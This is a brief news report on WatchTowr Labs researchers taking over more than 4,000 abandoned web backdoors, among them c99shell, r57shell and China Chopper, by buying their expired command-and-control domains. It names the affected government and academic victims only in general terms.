Security researchers discovered and hijacked over 4,000 unique web backdoors that had been deployed by various threat actors. The backdoors, which had been abandoned or were reliant on expired infrastructure, were seized and sinkholed by WatchTowr Labs through the purchase and registration of over 40 domain names that these backdoors used for command-and-control (C2) communications. The firm managed to gain control of the compromised systems for as little as $20 per domain.

The backdoors, which are essentially web shells designed to maintain persistent remote access to target networks, varied significantly in scope and functionality. Some of the backdoors were relatively simple, capable of executing attacker-provided commands via PHP-based tools like c99shell and r57shell, while other tools such as China Chopper were more sophisticated. The latter is a web shell associated with Chinese state-backed hacker groups.

Across those 4000 unique and live backdoors, some systems belonged to government entities in Bangladesh, China, and Nigeria, as well as academic institutions across China, South Korea, and Thailand.

The researchers said that several of the web shells had been backdoored by their original maintainers, inadvertently leaking critical information about the locations and entities where they had been deployed. This allowed other threat actors to hijack the backdoors and further use them for their own purposes.